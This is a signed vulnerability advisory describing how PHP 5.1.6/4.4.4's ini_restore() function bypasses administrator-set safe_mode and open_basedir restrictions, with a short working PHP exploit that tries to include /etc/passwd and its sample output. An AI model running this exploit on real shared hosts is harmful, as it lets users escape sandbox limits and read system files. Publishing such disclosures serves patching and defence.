-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
β 0.Description β
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig SΠΆther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much
of the PHP Conference Material is freely available.
php_admin_value name value
Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can
not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.
php_admin_flag name on|off
Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag
can not be overridden by .htaccess or virtualhost directives.
http://pl.php.net/manual/en/configuration.changes.php
For example:
open_basedir in httpd.conf
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()
Example:
If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore
Master Value to Local Value per ini_restore() function!
ini_restore
(PHP 4, PHP 5)
ini_restore β Restores the value of a configuration option
Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.
EXPLOIT:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
RESULT OF EXPLOIT:
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4
Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
For: sp3x
and
p_e_a, l5x
Regards
SecurityReason
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a
SvP3KPhmLtZcCNFmtGa8oJ8=
=bqQV
-----END PGP SIGNATURE-----